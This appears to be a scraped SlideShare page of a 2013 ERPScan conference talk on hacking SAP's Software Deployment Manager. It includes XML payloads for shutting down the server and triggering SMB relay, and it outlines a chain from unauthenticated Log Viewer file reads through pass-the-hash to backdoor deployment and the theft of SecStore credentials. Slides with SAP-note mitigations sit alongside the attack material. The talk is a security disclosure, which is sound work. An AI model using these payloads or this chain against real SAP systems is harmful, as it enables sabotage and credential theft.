SAP SDM Hacking
0 likes768 views
The document discusses the security vulnerabilities within SAP systems and the methods hackers employ to exploit these weaknesses, particularly through the Software Deployment Manager (SDM). It emphasizes the importance of security measures, ongoing research, and collaboration with SAP to enhance system protection. Additionally, it highlights the need for regular security assessments and updates to safeguard against potential attacks.
![A^ack
SAP
SDM.
DoS
• If
ajacker
uses
an
incorrect
password
3
8mes,
the
server
will
shutdown
automa8cally
• Also,
if
you
send
this
request,
you
can
shutdown
the
SDM
server
manually:
[10 spaces]56<?xml version="1.0"?>
<ShutDownRequest></ShutDownRequest>
22](https://image.slidesharecdn.com/2013hacktivity-150625130026-lva1-app6892/85/SAP-SDM-Hacking-22-320.jpg)
![A^acking
SAP
SDM.
SMB
relay
Packed:
[10 Spaces]<?xml version="1.0"?>
<FileAccessRequest f="ip_addrblabla"> </
FileAccessRequest>
An
old
trick,
but
some8mes
it’s
very
useful
23](https://image.slidesharecdn.com/2013hacktivity-150625130026-lva1-app6892/85/SAP-SDM-Hacking-23-320.jpg)
SAP SDM Hacking
- 1. Invest in security to secure investments Injec&ng evil code in your SAP J2EE systems: Security of SAP So<ware Deployment Server Dmitry Chastukhin Director of SAP pentest/research team
- 2. About ERPScan • The only 360-‐degree SAP Security solu8on -‐ ERPScan Security Monitoring Suite for SAP • Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presenta&ons key security conferences worldwide • 25 Awards and nomina&ons • Research team -‐ 20 experts with experience in different areas of security • Headquarters in Palo Alto (US) and Amsterdam (EU) 2
- 3. SAP popularity • The most popular business applica8on • More than 248,500 customers in 188 countries • More than 70% of Forbes 500 run SAP 3
- 4. SAP insecurity Espionage • Stealing financial informa8on • Stealing corporate secrets • Stealing supplier and customer lists • Stealing HR data Fraud • False transac8ons • Modifica8on of master data Sabotage • Denial of service • Modifica8on of financial reports • Access to technology network (SCADA) by trust rela8ons 4
- 5. 0 5 10 15 20 25 30 35 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 SAP hacking talks • BlackHat • Defcon • HITB • RSA • CONFidence • DeepSec • Hack8vity • Troopers • Source Source: SAP Security in Figures 5
- 6. More than 2700 in total Source: SAP Security in Figures 6 SAP vulnerabili&es
- 7. Is it remotely exploitable? > 5000 non-‐web SAP services exposed in the world including Dispatcher, Message Server, Sap Host Control, etc. sapscan.com 7
- 8. What about other services? 0 1 2 3 4 5 6 7 8 9 SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd Source: SAP Security in Figures 8
- 9. • Design Time Repository (DTR) • Component Build Service (CBS) • Change Management Service (CMS) • So[ware Landscape Directory (SLD) / NS • So[ware Deployment Manager (SDM) 9 SAP NetWeaver development infrastructure
- 12. 12 SAP NetWeaver development infrastructure
- 13. 13 SAP NetWeaver development infrastructure
- 14. 14 SAP NetWeaver development infrastructure
- 15. 15 SAP NetWeaver development infrastructure
- 16. So<ware Deployment Manager • Single interface for the deployment • Deploy apps (*.ear, *.war, *.sda) • Implement custom patches 16
- 17. SDM server • Different server modes – standalone – integrated • Only one user at 8me • Only hardcoded admin user • Two ports: – 50117 – Admin Port – 50118 – GUI Port 17
- 18. SDM client • Browsing the distribu8on of deployed components • Deploying and undeploying • Log viewing 18
- 19. SDM a^ack intro • SAP infrastructure includes many Java services • Almost all Java stuff uses UME • Universal user with a password • Only one user at a 8me • Ability to deploy evil code => plus, see 1st item 19
- 20. SDM a^ack intro • Thick client Java applica8on (sad story) • Scarce communica8ons segngs • Difficult to intercept • Custom protocols 20
- 21. SDM a^ack intro • SAP has its own SAP Java Virtual Machine (JVM) • Java 6 has Ajach API • Ajach to another running JVM • Intercept and modify calls 21
- 22. A^ack SAP SDM. DoS • If ajacker uses an incorrect password 3 8mes, the server will shutdown automa8cally • Also, if you send this request, you can shutdown the SDM server manually: [10 spaces]56<?xml version="1.0"?> <ShutDownRequest></ShutDownRequest> 22
- 23. A^acking SAP SDM. SMB relay Packed: [10 Spaces]<?xml version="1.0"?> <FileAccessRequest f="ip_addrblabla"> </ FileAccessRequest> An old trick, but some8mes it’s very useful 23
- 24. Preven&on • Install note 1724516 • Enable the security features of SDM • SDM server and SDM client need to be updated hjps://websmp205.sap-‐ag.de/~sapidb/012006153200000493902012E/ SDM_EnablingSecurity.pdf 24
- 25. From Nobody to Administrator Now, I will show an interes0ng a2ack Compromise Some SAP Services Compromise SAP SDM Compromise SAP Server OS Compromise SAP 25
- 26. SDM authen&ca&on abuse • OK. Let’s see how authen8ca8on in SDM works: – user enters password – hash is calculated locally on client – password hash is sent to server – hash is compared to hash from config file • Looks like a plain text password Pass the hash a^ack here! 26
- 27. SDM authen&ca&on abuse RootFrame.class 27
- 28. SDM authen&ca&on abuse …SDMprogramconfigsdmrepository.sdc 28
- 29. SDM authen&ca&on abuse SMDAuthen8catorImpl.class 29
- 30. A^ack on SAP SDM Read sdmrepository.sdc Get hash password Use hash as password to authen8cate on SDM server Deploy backdoor on SAP Server PROFIT! 30
- 31. File read • OS command execu8on through CTC (Notes 1467771, 1445998 ) • XML External En88es (Note 1619539) • Directory Traversal (Note 1630293 ) • Through MMC file read func8on (Notes 927637 and 1439348) We have something new for u J 31
- 32. SAP Log Viewer standalone • Open ports: 26000 (NI), 1099 (RMI), 5465 (Socket) • You can: – View log on local server – View log on remote server – Register file as log file Read log file without authen&ca&on! 32
- 33. SAP Log Viewer standalone A^ack is pre^y easy Connect to LogViewer standalone Server Register sdmrepository.sdc file as log file Read it 33
- 34. SAP Log Viewer standalone 34
- 35. SAP Log Viewer standalone When we have a password hash, we can use it as password to authen8cate on SDM server 35
- 36. SDM intrusion Full info about the SDM repository 36
- 37. Bypassing SDM restric&ons • Observe all server directories • Read arbitrary files via Log Viewer 37
- 38. SDM undeploying Undeploy any applica8on 38
- 39. SDM backdooring Deploy any applica8on 39
- 40. SDM backdooring • before • a[er 40
- 41. SDM post-‐exploita&on 41
- 42. Preven&on • Install Note 1724516, 1685106 • Enable the security features of SDM • SDM server and SDM client need to be updated hjps://websmp205.sap-‐ag.de/~sapidb/012006153200000493902012E/ SDM_EnablingSecurity.pdf 42
- 43. “The So=ware Deployment Manager (SDM) uses the database connec0on informa0on, the J2EE Engine administrator user and password from the secure storage in the file system, to connect to the J2EE Engine and perform tasks such as so=ware deployment and undeployment”. hjp://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/ 2e104202795e33e10000000a155106/content.htm Wow! J2EE Engine administrator user and password Where is all this stuff located? SAP SecStore 43
- 44. SAP SecStore “By default, the J2EE Engine stores secure data in the file usr sap<SID>SYSglobalsecuritydataSecStore.proper0es in the file system”. “The J2EE Engine uses the SAP Java Cryptography Toolkit to encrypt the contents of the secure store with the tripleDES algorithm”. hjp://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/ 2e104202795e33e10000000a155106/content.htm OK. Let’s try to read SecStore.proper0es 44
- 45. SAP SecStore • We can execute any OS command (we have our backdoor) • We know the SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: usrsap<SID>SYSglobalsecuritydataSecStore.properties • It’s all that we need 45
- 47. Get the password • We have an encrypted password • We have a key to decrypt it We got the J2EE admin and JDBC login:password! 47
- 48. Preven&on Restrict read access to files SecStore.proper0es and SecStore.key hjp://help.sap.com/saphelp_nw73ehp1/helpdata/en/cd/ 14c93ec2f7df6ae10000000a114084/content.htm 48
- 50. SDM hacking demo 50
- 51. It is possible to protect yourself from these kinds of issues, and we are working close with SAP to keep customers secure SAP Guides It’s all in your hands Regular security assessments ABAP code review Monitoring technical security Segrega&on of Du&es Security events monitoring 51 Conclusion
- 52. I'd like to thank SAP's Product Security Response Team for the great coopera0on to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new a2acks and demos, follow us at @erpscan and a2end future presenta0ons: • October 30-‐31 RSA Europe (Amsterdam, NL) • November 7-‐8 ZeroNights (Moscow, Russia) • November 10 G0S (New Dehli, India) 52 Future work
- 53. Web: www.erpscan.com e-‐mail: info@erpscan.com Twijer: @erpscan @_chipik 53